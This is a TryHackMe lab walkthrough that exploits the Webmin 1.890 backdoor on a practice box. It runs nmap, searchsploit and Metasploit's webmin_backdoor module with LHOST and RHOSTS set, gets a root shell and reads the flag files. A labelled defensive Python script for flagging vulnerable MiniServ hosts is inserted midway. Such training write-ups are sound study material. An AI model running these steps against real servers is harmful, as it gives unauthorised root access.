TryHackMe: Source Writeup
In the “Source” box on TryHackMe, participants are challenged to exploit a recent vulnerability in Webmin, a widely-used web-based interface for system administration.
To access the box, click on the following link and join the room.
Check connection
Ping the machine IP to check that the connection is established. In my case the ping is successful, so the connection is established.
Scanning
Let’s start with an Nmap scan. Use the following command to scan the target IP address.
nmap -sV -sC -Pn 10.10.136.187
The above command instructs Nmap to scan the host at IP address 10.10.136.187, skipping host discovery, using script scanning with default scripts, and attempting to determine the version of the services running on detected open ports.
nmap: Invokes Nmap, which stands for Network Mapper.
-sV: Enables version detection, allowing Nmap to determine the version numbers of the services running on open ports.
-sC: Enables script scanning using the default set of scripts. It's useful for detecting additional information and vulnerabilities in the target system.
-Pn: Tells Nmap to skip the discovery phase and treat all hosts as online. This is useful when scanning targets that block ping probes.
10.10.136.187: IP address of the target system.
The scan results show that port 22 and port 10000 are open. Port 10000 is serving MiniServ version 1.890, a web server commonly associated with the Webmin administration interface.
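From the defender's side, the same scan output can be used to inventory hosts that expose this MiniServ version. The following is an added example, not part of the original writeup: it parses nmap -sV normal output and flags open ports whose banner is MiniServ 1.890. The sample scan text, the 192.0.2.x hosts, and the function names are constructed for illustration, and the flagged-version set contains only the version this writeup identifies.

```python
import re

# 1.890 is the version this writeup identifies; extend the set from the
# vendor advisory for your own estate (assumption: exact string match).
FLAGGED_MINISERV = {"1.890"}

# Constructed sample of `nmap -sV` normal output, not captured from a real scan.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.136.187
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1
10000/tcp open  http    MiniServ 1.890 (Webmin httpd)
Nmap scan report for lab-b.example (192.0.2.20)
PORT      STATE  SERVICE VERSION
10000/tcp closed snet-sensor-mgmt
8443/tcp  open   http    MiniServ 1.930 (Webmin httpd)
Nmap scan report for 192.0.2.30
PORT      STATE SERVICE VERSION
10000/tcp open  http    MiniServ 1.890 (Webmin httpd)
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([^\s()]+)\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
MINISERV_RE = re.compile(r"\bMiniServ (\d+(?:\.\d+)+)")

def find_webmin(scan_text):
    """Return one record per open port whose version banner is MiniServ."""
    findings, host = [], None
    for line in scan_text.splitlines():
        line = line.rstrip()
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)          # IP address, also for "name (ip)" headers
            continue
        m = PORT_RE.match(line)
        if not m or host is None or m.group(3) != "open":
            continue                   # script output, headers, closed/filtered ports
        v = MINISERV_RE.search(m.group(5) or "")
        if v:
            findings.append({"host": host, "port": int(m.group(1)),
                             "version": v.group(1),
                             "flagged": v.group(1) in FLAGGED_MINISERV})
    return findings

def flagged_hosts(findings):
    """Hosts that need patching or isolating, in first-seen order."""
    return list(dict.fromkeys(f["host"] for f in findings if f["flagged"]))

if __name__ == "__main__":
    for f in find_webmin(SAMPLE_SCAN):
        print(f)
```

Matching on the banner rather than on port 10000 also catches Webmin instances moved to a non-default port, as the 8443 entry in the sample shows.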
Search for exploit
Let’s search for Webmin 1.890 with searchsploit (Exploit Database Repository) to check whether an exploit is available for this particular service. Use the following command to search for an exploit.
searchsploit webmin 1.890
Metasploit
Let’s start Metasploit by using the command msfconsole.
Once the console is initialized, let’s use the search webmin command to find an exploit for the Webmin service.
Out of all the search results, webmin_backdoor seems right, with the rank excellent. Let’s use it by typing the command use 7.
I used the options command to check the available options for this exploit.
Setting LHOST
LHOST (Local Host) refers to the IP address of the attacker's machine. It is the host on which the Metasploit framework is running and typically the machine to which the exploited system will connect back (e.g., for a reverse shell). LHOST is used to specify where the payload will send its connection or where to listen for incoming connections in the case of a reverse connection.
To set LHOST we can use the following command in msfconsole.
set LHOST tun0
Setting RHOST
RHOST (Remote Host) refers to the IP address of the target or victim's machine. It is the host that the attacker aims to exploit or scan. RHOST is used to specify the destination address for the exploit or scan being performed.
To set RHOST (the option is named RHOSTS in this module) we can use the following command in msfconsole.
set RHOSTS 10.10.177.55
Exploiting target
Now, to execute the configured exploit against the specified RHOST, let’s use the exploit command in msfconsole. This command will initiate the attack, and if successful, it may provide us with access to the target system. And BOOOM, we are in!!!
Let’s type the id command to check the info of the user.
Get root flag
The result of the id command shows that we are logged in as the root user, so let’s check what is present in the /root directory of the target machine. We can simply do this by using the command ls /root, and we have our desired root.txt file. Let’s use the following command to capture our root flag.
cat /root/root.txt
Get user flag
Now, let’s check the /home directory to see which users are present. We can simply check that by displaying the contents of the /home directory with the ls /home command.
We have a user named dark in the home directory. So let’s use the ls /home/dark command to check what dark is hiding.
And we have our desired user.txt file. Let’s use the following command to capture our user flag.
cat /home/dark/user.txt
Copy and paste your flags on TryHackMe.
CONGRATULATIONS!!! The room is completed!
This walkthrough finishes here. Stay tuned for the next adventure! 🚀😊